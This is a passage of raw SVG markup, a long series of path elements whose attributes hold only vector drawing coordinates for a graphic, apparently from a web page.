d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n <path 